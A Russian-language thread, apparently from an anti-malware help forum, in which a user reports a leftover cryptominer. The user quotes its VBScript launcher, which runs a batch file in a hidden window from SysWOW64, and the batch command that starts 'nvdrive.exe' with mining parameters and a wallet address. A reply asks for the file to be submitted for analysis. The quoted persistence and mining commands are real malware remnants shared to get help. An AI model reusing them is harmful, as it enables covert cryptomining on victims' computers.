-
Junior Member
- Вес репутации
- 45
SysWOW64
Здравствуйте.
Не очень давно обращался к вам на форум в раздел "Помогите" с биткоин майнером, проблема решилась хорошо, пока никаких последствий или новых "лаж" не обнаружено, но возникло вот что.
Включил сегодня компьютер, и, пока он загружался (хотя он и загружается за 10-15сек), пошел наливать чай. Пришел и увидел, что открыт какой-то файл блокнота с названием start. Так как компьютером пользуюсь практически я один и без моего ведома никто ничего здесь не делает, понял, что это "не мой файл". Проанализировал содержание этого файла и нашел знакомые буквы "SysWOW64". Знакомые они потому, что некоторые подозрительные файлы при убиении майнера находились в этой папке. Знаю, что она системная, но...
В общем, вот текст блокнота открытого:
Set oShell = Wscript.CreateObject("WScript.Shell")
CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\Start.bat"
oShell.Run CommandLine, 0, 0
bat'ник, окей. Пошел в директорию и нашел там не только батник, но и vbs файл с таким же названием. скопировал последний, сменил vbs на txt (забыл как называется, расширение..?), открыл.
Внутри был такой текст:
c:\Windows\SysWOW64\nvdrive.exe -dbg -1 -lowcpu 2 -u 49ZuQzYVYBr6yy6hPiHPYa5i7iJN9nJMvKBDZs5b4VSR7R5w8m wr3ssdbMupL1bpaXaEXHwvFsXvNjTAL4pCCWZhE2iaA9K -p x
Хоть я и не особо шарю в "кодах", но вижу, что тут есть параметры запуска (не так ли?) nvdrive... а при чем здесь CPU?
В общем суть вопроса. Все здесь хорошо и файл открылся случайно (не верю особо в случайности) или обращаться в "Помогите"?
Заранее спасибо.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Отправьте файл
Сообщение от
Vintorez174
c:\Windows\SysWOW64\nvdrive.exe
согласно инструкции http://virusinfo.info/showthread.php?t=37678
Рекомендую повторно обратиться в раздел помощи.
-